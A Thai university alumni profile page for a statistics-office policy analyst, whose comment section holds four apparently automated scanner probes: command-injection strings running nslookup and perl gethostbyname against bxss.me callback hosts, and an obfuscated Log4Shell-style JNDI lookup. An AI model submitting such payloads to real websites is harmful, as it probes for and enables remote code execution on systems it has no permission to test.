คุณฐิติมา ปานศรี

 

จบหลักสูตร

จบปริญญาโท ปีการศึกษา 2562

ตำแหน่ง

นักวิเคราะห์นโยบายและแผนปฏิบัติการ สำนักงานสถิติแห่งชาติ

จบหลักสูตรจาก

จบปริญญาตรี ค.บ.(เทคโนโลยีและนวัตกรรมการศึกษา) สถาบันราชภัฎสวนดุสิต

ที่ทำงาน
สำนักงานสถิติแห่งชาติ
หมายเลขโทรศัพท์ :
xxxxx
Email
XXX

443 ความคิดเห็น

  1. ;(nslookup hitzcgsdowamk7a45c.bxss.me||perl -e “gethostbyname(‘hitzcgsdowamk7a45c.bxss.me’)”)|(nslookup hitzcgsdowamk7a45c.bxss.me||perl -e “gethostbyname(‘hitzcgsdowamk7a45c.bxss.me’)”)&(nslookup hitzcgsdowamk7a45c.bxss.me||perl -e “gethostbyname(‘hitzcgsdowamk7a45c.bxss.me’)”)

  2. ;(nslookup hitgvoabihyec41eec.bxss.me||perl -e “gethostbyname(‘hitgvoabihyec41eec.bxss.me’)”)|(nslookup hitgvoabihyec41eec.bxss.me||perl -e “gethostbyname(‘hitgvoabihyec41eec.bxss.me’)”)&(nslookup hitgvoabihyec41eec.bxss.me||perl -e “gethostbyname(‘hitgvoabihyec41eec.bxss.me’)”)

  3. &(nslookup hitottmbldwaj1232c.bxss.me||perl -e “gethostbyname(‘hitottmbldwaj1232c.bxss.me’)”)&’\”`0&(nslookup hitottmbldwaj1232c.bxss.me||perl -e “gethostbyname(‘hitottmbldwaj1232c.bxss.me’)”)&`’

  4. 💡'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitfsnonxgpci57212${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ทิ้งคำตอบไว้

กรุณาใส่ความคิดเห็นของคุณ!
กรุณาใส่ชื่อของคุณที่นี่